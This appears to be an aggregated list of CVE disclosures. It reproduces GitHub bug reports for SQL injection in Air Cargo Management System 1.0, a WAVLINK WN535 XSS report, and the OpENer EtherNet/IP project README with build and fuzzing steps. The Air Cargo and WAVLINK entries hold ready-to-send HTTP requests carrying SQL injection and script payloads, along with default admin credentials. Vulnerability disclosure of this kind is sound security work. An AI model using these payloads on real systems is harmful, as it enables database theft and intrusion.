Air Cargo Management System 1.0 is vulnerable to SQL Injection via /acms/admin/?page=transactions/manage_transaction&id=.

**Air Cargo Management System v1.0 by oretnom23 has SQL injection**

Author： k0xx

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/15188/air-cargo-management-system-php-oop-free-source-code.html

Vulnerability File: /acms/admin/?page=transactions/manage\_transaction&id=

Vulnerability location: /acms/admin/?page=transactions/manage\_transaction&id=,id

\[+\] Payload: /acms/admin/?page=transactions/manage\_transaction&id=1%27%20and%20length(database())%20=7%20--+ // Leak place ---> id

Current database name: acms\_db,length is 7

GET /acms/admin/?page\=transactions/manage\_transaction&id\=1%27%20and%20length(database())%20\=7%20\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=aaffvur9cmo069649rorqsbmeh
Connection: close

When length (database ()) = 6, Content-Length: 37255 

When length (database ()) = 7, Content-Length: 43289

CVE-2022-30374: bug_report/SQLi-5.md at main · k0xx11/bug_report

Air Cargo Management System 1.0 is vulnerable to SQL Injection via /acms/classes/Master.php?f=delete_cargo_type.

Permalink

Cannot retrieve contributors at this time

**Air Cargo Management System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15188/air-cargo-management-system-php-oop-free-source-code.html

The password for the backend login account is: admin/admin123

Vulnerability File: /acms/classes/Master.php?f=delete\_cargo\_type

Vulnerability location: /acms/classes/Master.php?f=delete\_cargo\_type, id

\[+\] Payload: id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /acms/classes/Master.php?f\=delete\_cargo\_type HTTP/1.1
Host: 192.168.1.19
Content\-Length: 65
Accept: application/json, text/javascript, \*/\*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.19
Referer: http://192.168.1.19/acms/admin/?page=cargo\_types
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=8j006kgjjl9sdts88scke1lkuq
Connection: close
id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

CVE-2022-30370: bug_report/SQLi-1.md at main · k0xx11/bug_report

WAVLINK WN535 G3 was discovered to contain a cross-site scripting (XSS) vulnerability via the hostname parameter at /cgi-bin/login.cgi.

    POST /cgi-bin/login.cgi HTTP/1.1 Host: 98.127.66.193 Content-Length: 255 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://98.127.66.193 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://98.127.66.193/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close newUI=1&page=login&username=admin&langChange=0&ipaddr=171.113.240.243&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=")&lt;/&gt;&lt;&gt;alert(1)&lt;/&gt;&key=M27234733&password=63a36bceec2d3bba30d8611c323f4cda&lang_=cn

CVE-2022-30489: GitHub - badboycxcc/XSS-CVE-2022-30489

CVE-2022-30489: GitHub - badboycxcc/XSS

Air Cargo Management System 1.0 is vulnerable to SQL Injection via /acms/classes/Master.php?f=delete_cargo.

Permalink

Cannot retrieve contributors at this time

**Air Cargo Management System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15188/air-cargo-management-system-php-oop-free-source-code.html

The password for the backend login account is: admin/admin123

Vulnerability File: /acms/classes/Master.php?f=delete\_cargo

Vulnerability location: /acms/classes/Master.php?f=delete\_cargo, id

\[+\] Payload: id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /acms/classes/Master.php?f\=delete\_cargo HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/acms/admin/?page=transactions/view\_transaction&id=3
Content-Length: 65
Cookie: PHPSESSID=aaffvur9cmo069649rorqsbmeh
Connection: close
id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

CVE-2022-30372: bug_report/SQLi-2.md at main · k0xx11/bug_report

Air Cargo Management System 1.0 is vulnerable to SQL Injection via /acms/admin/cargo_types/view_cargo_type.php?id=.

**Air Cargo Management System v1.0 by oretnom23 has SQL injection**

Author： k0xx

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/15188/air-cargo-management-system-php-oop-free-source-code.html

Vulnerability File: /acms/admin/cargo\_types/view\_cargo\_type.php?id=

Vulnerability location: /acms/admin/cargo\_types/view\_cargo\_type.php?id=,id

\[+\] Payload: /acms/admin/cargo\_types/view\_cargo\_type.php?id=2%27%20and%20length(database())%20=7%20--+ // Leak place ---> id

Current database name: acms\_db,length is 7

GET /acms/admin/cargo\_types/view\_cargo\_type.php?id\=2%27%20and%20length(database())%20\=7%20\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=aaffvur9cmo069649rorqsbmeh
Connection: close

When length (database ()) = 6, Content-Length: 1161 

When length (database ()) = 7, Content-Length: 1043

CVE-2022-30371: bug_report/SQLi-3.md at main · k0xx11/bug_report

A specifically crafted packet sent by an attacker to EIPStackGroup OpENer EtherNet/IP commits and versions prior to Feb 10, 2021 may result in a denial-of-service condition.

   

**OpENer Version 2.3.0****Welcome to OpENer!**

OpENer is an EtherNet/IP™ stack for I/O adapter devices; supports multiple I/O and explicit connections; includes objects and services to make EtherNet/IP™- compliant products defined in THE ETHERNET/IP SPECIFICATION and published by ODVA (http://www.odva.org).

**Participate!**

Users and developers of OpENer can join the respective Google Groups in order to exchange experience, discuss the usage of OpENer, and to suggest new features and CIP objects, which would be useful for the community.

Developers mailing list: https://groups.google.com/forum/#!forum/eip-stack-group-opener-developers

Users mailing list: https://groups.google.com/forum/#!forum/eip-stack-group-opener-users

**Requirements:**

OpENer has been developed to be highly portable. The default version targets PCs with a POSIX operating system and a BSD-socket network interface. To test this version we recommend a Linux PC or Windows with Cygwin (http://www.cygwin.com) installed. You will need to have the following installed:

*   CMake
*   gcc
*   make
*   binutils
*   the development library of libcap (libcap-dev or equivalient)

for normal building. These should be installed on most Linux installations and are part of the development packages of Cygwin.

If you want to run the unit tests you will also have to download CppUTest via https://github.com/cpputest/cpputest

For configuring the project we recommend the use of a CMake GUI (e.g., the cmake-gui package on Linux, or the Installer for Windows available at CMake)

**Compile for Linux/POSIX:**

1.  Make sure all the needed tools are available (CMake, make, gcc, binutils)
2.  Change to the /bin/posix
3.  For a standard configuration invoke setup_posix.sh
    1.  Invoke the make command
        
    2.  Grant OpENer the right to use raw sockets via sudo setcap cap_net_raw+ep ./src/ports/POSIX/OpENer
        
    3.  Invoking OpENer:
        
        ./src/ports/POSIX/OpENer <interface_name>
        
        e.g. ./src/ports/POSIX/OpENer eth1
        

OpENer also now has a real-time capable POSIX startup via the OpENer\_RT option, which requires that the used kernel has the full preemptive RT patches applied and activated. If you want to use OpENer\_RT, instead of step 2, the sudo setcap cap_net_raw,cap_ipc_lock,cap_sys_nice+ep ./src/ports/POSIX/OpENer  has to be run to grant OpENEr CAP_SYS_NICE, CAP_IPC_LOCK, and the CAP_NET_RAW capabilities, needed for the RT mode

Shared library support has been added to CMakeLists file and is enabled by setting OPENER\_BUILD\_SHARED\_LIBS=ON. It has only been tested under Linux/POSIX platform.

**Compile for Windows XP/7/8 via Visual Studio:**

1.  Invoke setup\_windows.bat or configure via CMake
2.  Open Visual Studio solution OpENer.sln in bin/win32
3.  Compile OpENer by chosing Build All in Visual Studio
4.  For invoking OpENer type from the command line:
    1.  Change to \\bin\\win32\\src\\ports\\WIN32\\
        
    2.  Depending if you chose the Debug or Release configuration in Visual Studio, your executable will either show up in the subfolder Debug or Release
        
    3.  Invoke OpENer via
        
        OpENer <interface_index>
        
        e.g. OpENer 3
        

In order to get the correct interface index enter the command route print in a command promt and search for the MAC address of your chosen network interface at the beginning of the output. The leftmost number is the corresponding interface index.

**Compile for Windows XP/7/8/10 via Cygwin:**

The POSIX setup file can be reused for Cygwin. Please note, that you cannot use RT mode and you will have to remove the code responsible for checking and getting the needed capabilities, as libcap is not available in Cygwin. The easier and more supported way to build OpENer for Windows is to either use MinGW or Visual Studio.

In order to run OpENer, it has to be run as privileged process, as it needs the rights to use raw sockets.

**Compile for MinGW on Windows XP/7/8/10**

1.  Make sure 64 bit mingw is installed. (Test with gcc --version, should show x86\_64-posix-seh-rev1)
2.  Make sure CMake is installed. (Test with cmake --version, should be version 3.xx)
3.  Change to /bin/mingw
4.  Run the command setup_mingw.bat in a dos command line. (Not a bash shell). If tracing is desired, use the following (where the cmake parameter must be enclosed in quotes) or change the ./source/CMakeList.txt file.
    
        setup_mingw.bat "-DOpENer_TRACES:BOOL=TRUE"
        
    
5.  Run the command "make" from the same directory (./bin/mingw)
6.  The opener.exe is now found in \\bin\\mingw\\src\\ports\\MINGW
7.  Start it like this: "opener 192.168.250.22", where the ip address is the local computer's address on the nettwork you want to use.

**Directory structure:**

*   bin ... The resulting binaries and make files for different ports
*   doc ... Doxygen generated documentation (has to be generated for the SVN version) and Coding rules
*   data ... EDS file for the default application
*   source
    *   src ... the production source code
        *   cip ... the CIP layer of the stack
        *   cip\_objects ... additional CIP objects
        *   enet\_encap ... the Ethernet encapsulation layer
        *   ports ... the platform specific code
        *   utils ... utility functions
    *   tests ... the test source code
        *   enet\_encap ... tests for Ethernet encapsulation layer
        *   utils ... tests for utility functions

**Documentation:**

The documentation of the functions of OpENer is part of the source code. The source packages contain the generated documentation in the directory doc/api\_doc. If you use the GIT version you will need the program Doxygen for generating the HTML documentation. You can generate the documentation by invoking doxygen from the command line in the opener main directory.

**Fuzzing****Intro**

Fuzzing is an automated testing method that directs varying input data to a program in order to monitor output. It is a way to test for overall reliability as well as identify potential security bugs.

The fuzzer we are using is AFL, a fuzzer that uses runtime guided techniques to create input for the tested program. From a high-level prespective AFL works as follows:

*   Forks the fuzzed process
*   Genereates a new test case based on a predefined input
*   Feeds the fuzzed process with the test case through STDIN
*   Monitors the execution and registers which paths are reachable

**Compile**

To start fuzzing this project with AFL you'll need to compile it with AFL. First make sure you have AFL installed:

    sudo apt install build-essential
    wget http://lcamtuf.coredump.cx/afl/releases/afl-latest.tgz
    tar xzf afl-latest.tgz
    cd afl*
    make && sudo make install
    echo "AFL is ready at: $(which afl-fuzz)"
    
    

Then, compile OpENer with AFL:

1.  Change to the OpENer/bin/posix directory
2.  Compile OpENer with AFL ./setup_posix_fuzz_afl.sh
3.  Run make

**Fuzz**

Finally, generate some test cases and start AFL:

    # Generate inputs
    mkdir inputs
    echo 630000000000000000000000000000000000000000000000 | xxd -r -p > ./inputs/enip_req_list_identity
    # You can also use the inputs we prepared from OpENer/fuzz/inputs
    # Finally, let's fuzz!
    afl-fuzz -i inputs -o findings ./src/ports/POSIX/OpENer <interface_name>
    

**Reproduce a crash**

Usually to reproduce a crash it's enough to retransmit the testcase using cat testcase | nc IP_ADDR 44818 However, since CIP runs over the EtherNet/IP layer, it must first register a valid session. Therefore, we need to use a dedicated script: python fuzz/scripts/send_testcase.py IP testcase_path

**Porting OpENer:**

For porting OpENer to new platforms please see the porting section in the Doxygen documentation.

**Contributing to OpENer:**

The easiest way is to fork the repository, then create a feature/bugfix branch. After finishing your feature/bugfix create a pull request and explain your changes. Also, please update and/or add doxygen comments to the provided code sections. Please stick to the coding conventions, as defined in source/doc/coding\_rules The easiest way to conform to the indenting convertion is to set uncrustify as git filter in the OpENer repository, which can be done with the following to commands:

    git config filter.uncrustify.clean "/path/to/uncrustify/uncrustify -c uncrustify.cfg --mtime --no-backup"
    
    git config filter.uncrustify.smudge "cat"

CVE-2021-27500: GitHub - EIPStackGroup/OpENer: OpENer is an EtherNet/IP stack for I/O adapter devices. It supports multiple I/O and explicit connections and includes objects and services for making EtherNet/IP-compli

Tag

#windows